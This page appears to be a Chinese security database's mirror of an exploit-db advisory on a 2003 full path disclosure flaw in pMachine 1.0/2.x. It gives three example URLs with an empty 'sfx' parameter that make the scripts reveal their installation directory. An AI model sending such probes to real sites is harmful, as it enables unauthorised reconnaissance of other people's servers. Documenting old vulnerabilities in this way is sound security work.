pMachine 1.0/2.x – Multiple Script ‘sfx’ Full Path Disclosures

pMachine 1.0/2.x – Multiple Script ‘sfx’ Full Path Disclosures

漏洞ID 1053975 漏洞类型
发布时间 2003-06-19 更新时间 2003-06-19
图片[1]-pMachine 1.0/2.x – Multiple Script ‘sfx’ Full Path Disclosures-安全小百科CVE编号 N/A
图片[2]-pMachine 1.0/2.x – Multiple Script ‘sfx’ Full Path Disclosures-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22809
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7980/info
 
It has been reported that pMachine is prone to remote a patch disclosure vulnerability when accessing various scripts.
 
When a request is made for a target PHP script, possibly requiring a blank URI parameter, pMachine is said to throw an exception. When this occurs, the resulting error page discloses the installation directory of the respective PHP script. 

http://www.example.com/Path_To_pMachine/index.php?sfx=
http://www.example.com/Path_To_pMachine/inc.lib.php?sfx=
http://www.example.com/Path_To_pMachine/inc.cp.php?sfx=

相关推荐: AIX dtmail(1) Insecure Temporary File Creation Vulnerability

AIX dtmail(1) Insecure Temporary File Creation Vulnerability 漏洞ID 1104849 漏洞类型 Origin Validation Error 发布时间 1998-12-09 更新时间 1998-1…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享